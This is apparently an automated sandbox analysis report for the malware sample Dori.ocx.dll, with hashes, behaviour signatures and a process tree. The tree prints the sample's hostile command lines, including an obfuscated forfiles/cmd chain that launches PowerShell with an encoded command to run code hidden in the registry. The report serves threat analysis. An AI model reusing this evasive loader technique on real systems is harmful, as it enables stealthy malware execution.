Overview

overview

10

Static

static

Dori.ocx.dll

windows7_x64

10

Dori.ocx.dll

windows10_x64

8

Analysis

  • max time kernel
    89s
  • max time network
    135s
  • platform
    windows10_x64
  • resource
    win10v20201028
  • submitted
    13-11-2020 10:50

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Dori.ocx.dll

  • Size

    141KB

  • MD5

    745868c40e6f1d1d40ae60335417f6d7

  • SHA1

    cfe42b4014fc22596b4305271c4a133492603349

  • SHA256

    7a5e4fd35a1a636ef1beb7e62cc647d7e63f5c7aadd2aa1a49d49c81183aca93

  • SHA512

    fae585aa131dfa0c5063991fe13938f73c83d78b43ee142ca39e767ec7db6ec7bb419522b4c0c6c210163b05e95db896388446dd8b70b7a29d4c6fe31d130b18

Score
8/10

Malware Config

Signatures

  • Blacklisted process makes network request 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 28 IoCs
    adwarespyware
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of WriteProcessMemory 22 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:3032
      • C:\Windows\system32\rundll32.exe
        rundll32.exe C:\Users\Admin\AppData\Local\Temp\Dori.ocx.dll,#1
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:2268
        • C:\Windows\SysWOW64\rundll32.exe
          rundll32.exe C:\Users\Admin\AppData\Local\Temp\Dori.ocx.dll,#1
          3⤵
          • Blacklisted process makes network request
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of WriteProcessMemory
          PID:512
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /c start /min forfiles /c "cmd /k @path -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwATgBlAHQAaQBkACcAKQAuAFQA & exit" /p C:\Windows\system32 /s /m po*l.e*e
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:3960
        • C:\Windows\system32\forfiles.exe
          forfiles /c "cmd /k @path -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwATgBlAHQAaQBkACcAKQAuAFQA & exit" /p C:\Windows\system32 /s /m po*l.e*e
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:3636
          • C:\Windows\system32\cmd.exe
            /k "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwATgBlAHQAaQBkACcAKQAuAFQA & exit
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:3896
            • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
              C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwATgBlAHQAaQBkACcAKQAuAFQA
              5⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious behavior: MapViewOfSection
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:2284
              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\j04s3o5s\j04s3o5s.cmdline"
                6⤵
                • Suspicious use of WriteProcessMemory
                PID:2320
                • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES34BD.tmp" "c:\Users\Admin\AppData\Local\Temp\j04s3o5s\CSC7F67302AD8814C2881F48C1779177F5.TMP"
                  7⤵
                    PID:1572
                • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                  "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ksenfjw4\ksenfjw4.cmdline"
                  6⤵
                  • Suspicious use of WriteProcessMemory
                  PID:748
                  • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES3588.tmp" "c:\Users\Admin\AppData\Local\Temp\ksenfjw4\CSCB4AB3F1D41644231A36353BADBDA74.TMP"
                    7⤵
                      PID:356
        • C:\Program Files\Internet Explorer\iexplore.exe
          "C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
          1⤵
          • Modifies Internet Explorer settings
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of SetWindowsHookEx
          • Suspicious use of WriteProcessMemory
          PID:4000
          • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
            "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4000 CREDAT:82945 /prefetch:2
            2⤵
            • Modifies Internet Explorer settings
            • Suspicious use of SetWindowsHookEx
            PID:2380

        Network

        MITRE ATT&CK Enterprise v6

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • memory/512-31-0x00000000031E0000-0x00000000031F8000-memory.dmp

          Filesize

          96KB

          Download

        • memory/512-1-0x00000000053E0000-0x00000000053F2000-memory.dmp

          Filesize

          72KB

          Download

        • memory/2284-9-0x00007FF989BA0000-0x00007FF98A58C000-memory.dmp

          Filesize

          9.9MB

          Download

        • memory/2284-19-0x000002666A300000-0x000002666A301000-memory.dmp

          Filesize

          4KB

          Download

        • memory/2284-27-0x000002666A310000-0x000002666A311000-memory.dmp

          Filesize

          4KB

          Download

        • memory/2284-10-0x000002666A2B0000-0x000002666A2B1000-memory.dmp

          Filesize

          4KB

          Download

        • memory/2284-28-0x000002666A350000-0x000002666ADA0000-memory.dmp

          Filesize

          10.3MB

          Download

        • memory/2284-29-0x000002666ADC0000-0x000002666ADD8000-memory.dmp

          Filesize

          96KB

          Download

        • memory/2284-11-0x000002666AFF0000-0x000002666AFF1000-memory.dmp

          Filesize

          4KB

          Download